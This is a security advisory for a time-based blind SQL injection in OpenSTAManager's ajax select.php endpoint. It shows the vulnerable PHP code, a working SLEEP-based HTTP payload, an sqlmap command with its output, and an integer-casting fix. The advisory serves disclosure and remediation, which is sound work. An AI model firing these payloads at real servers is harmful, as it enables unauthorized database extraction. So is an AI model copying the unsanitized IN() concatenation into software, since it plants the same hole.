PT-2026-6867 — Devcode-It/Openstamanager

PT-2026-6867 · Packagist · Devcode-It/Openstamanager

Published

2026-02-06

Updated

2026-02-06

CVSS v3.1

8.8

High

Vector

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

A SQL Injection vulnerability exists in the ajax select.php endpoint when handling the componenti operation. An authenticated attacker can inject malicious SQL code through the options[matricola] parameter.

Proof of Concept

Vulnerable Code

File: modules/impianti/ajax/select.php:122-124

case 'componenti':
  $impianti = $superselect['matricola'];
  if (!empty($impianti)) {
    $where[] = '`my componenti`.`id impianto` IN ('.$impianti.')';
  }

Data Flow

Source: $ GET['options']['matricola'] → $superselect['matricola']
Vulnerable: User input concatenated directly into IN() clause without sanitization
Sink: Query executed via AJAX framework

Exploit

Manual PoC (Time-based Blind SQLi):

GET /ajax select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>

SQLMap Exploitation:

sqlmap -u 'http://localhost:8081/ajax select.php?op=componenti&options[matricola]=1*' 
 --cookie="PHPSESSID=<session>" 
 --dbms=MySQL 
 --technique=T 
 --level=3 
 --risk=3

SQLMap Output:

[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12

Impact

Data Exfiltration: Time-based blind SQL Injection allows complete database extraction
Authentication Bypass: Access to sensitive component and equipment data
Data Manipulation: Potential unauthorized modification of records

Remediation

Cast values to integers before using in SQL:

Before:

$impianti = $superselect['matricola'];
if (!empty($impianti)) {
  $where[] = '`my componenti`.`id impianto` IN ('.$impianti.')';
}

After:

$impianti = $superselect['matricola'];
if (!empty($impianti)) {
  $ids = array map('intval', explode(',', $impianti));
  $where[] = '`my componenti`.`id impianto` IN ('.implode(',', $ids).')';
}

Credit

Discovered by: Łukasz Rybak

Fix

SQL injection

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-89

Related Identifiers

GHSA-QJV8-63XQ-GQ8M

Affected Products

Devcode-It/Openstamanager